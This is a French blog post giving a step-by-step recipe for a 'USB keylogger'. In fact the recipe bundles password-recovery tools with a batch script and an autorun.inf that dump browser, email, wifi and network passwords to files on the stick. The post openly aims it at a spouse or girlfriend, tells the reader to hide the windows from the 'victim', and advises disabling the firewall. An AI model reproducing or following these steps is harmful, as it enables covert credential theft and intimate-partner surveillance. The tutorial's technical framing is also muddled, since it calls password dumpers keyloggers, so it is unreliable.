-->

Comment créer un USB keylogger

Pour connaitre le mot de passe de quelqu'un? La seule manière la plus efficace est celle qui est mentionné ci-dessous. Si vous vous souvenez dans un post précédant j'avais parlé de keyloggers mais nous n'étions pas entre dans tous les détails.
Mais aujourd'hui nous allons apprendre comment créer un keylogger en 2-3 minutes qui enregistre effectivement tout les mots de passe de votre épouse ou petite amie?
En effet cette technique peut s'avérer efficace lorsque vous l'appliquer très bien.

Les keyloggers sont furtif: ce qui veut dire qu'elles travaillent en arrière plan une fois qu'elles sont installées sur une machine cible. Elles peuvent aussi vous aider à pirater vos wifi de bureau; les mails qui ont été envoyés, etc.

                                                              1- Création d'un keylogger

                                                    a- Téléchargement des applications requises
                                                   
-WebBrowserpassview.exe
-WirelessKeyView.exe
-netpass.exe
-mailpv.exe

Vous pouvez télécharger toute ces applications sur le site Web site: Cliquer ici pour aller sur le site de téléchargement

                                                             2- Création d'un fichier batch
Après avoir téléchargé ces applications nous allons maintenant créer un programme qui permet d'exécuter ces extensions .Exe à la fois.
-Ouvrer bloc-notes et puis saisissez ce code dessus :

@echo off
start WebBrowserPassView.exe /stext dossier1/WebBrowserPassView.txt
start mailpv.exe /stext dossier1/mailpv.txt
start WirelessKeyView.exe /stext dossier1/WirelessKeyView.txt
start netpass.exe /stext dossier1/netpass.txt

Et puis l'enregistre avec l'extension .bat par exemple launch.bat.

                                                            3- Création d'un fichier autorun

Un fichier autorun est un programme qui permet d'exécuter une tache automatiquement lors de son insertion. Et lorsqu'il est inséré sur une machine tout s'effectue automatiquement à chaque fois que l'utilisateur redémarre sa machine ou lorsque ça  machine est en marche. Donc désormais plus besoin de se fatiguer pour le faire manuellement.
Mais beaucoup de personnes rencontrent des échecs quant-ils viennent à créer un keylogger. Parce qu'ils n'ont pas bien suivit le tutoriel.
* Ouvrer bloc-notes et puis saisissez ce code :

[autorun]

open=launch.bat

ACTION="Bienvenue"

Et puis enregistre votre fichier avec l'extension .inf par exemple launch.inf
ACTION="Bienvenue" est ce qui va s'afficher automatiquement lorsque vous allez insérer cette clé Flash drive dans une machine. Donc pour la mettre en marche vous n'aurez qu'à cliquer dessus. Et puis encore autre chose, vous pouvez changer le nom comme bon vous semble par exemple ACTION="Richard Hacker"

                                                   3-Installation du keylogger sur  une Clé USB ou Machine cible
                                                  
Après, créé un nouveau dossier avec tous les fichiers WebBrowserpassview.exe ; WirelessKeyView.exe ; netpass.exe ; mailpv.exe ; launch.bat ; autorun.inf  et donner un nouveau nom à ce dossier.

                                                                     4- Exécution du keylogger

Maintenant il ne vous reste qu'à exécuter toutes ces applications de manière à ce qu'elles travaillent en arrière plan. Tout ce que vous avez à faire c'est de cliquer sur le fichier "launch.bat" que vous avez créé récemment.
Vous verrez que toutes les applications sont exécutées  instantanément; si vous souhaitez que votre victime ne sache pas que vous avez installé un keylogger sur sa machine,  je vous conseillerai de fermer toute ces nouvelles fenêtres ouvertes et laisser l'application faire son travail.
Mais j'allais oublier certaines applications sont détectées comme étant des virus pour l'ordinateur par exemple le wifi est protéger par votre pare-feu Windows et le mailpv. Donc vous devez apporter une autorisation particulière à toute ces applications dans votre ordinateur ou soit désactiver votre pare-feu peut aider notre outil à travailler sans problème. Ou soit cliquer sur « autoriser un programme via le pare-feu Windows » pour autoriser ces applications manuellement.


Surtout, laissez vos impressions en commentaires et n’hésiter pas à me demander de l’aide si vous avez des difficultés.

Mr Richard.
Devise: Nous piratons pour apprendre aux autres qu'ils peuvent être piratés, la priorité c'est de chercher la faille qui émerge dans notre système et de le corriger.

Aucun commentaire:

Publier un commentaire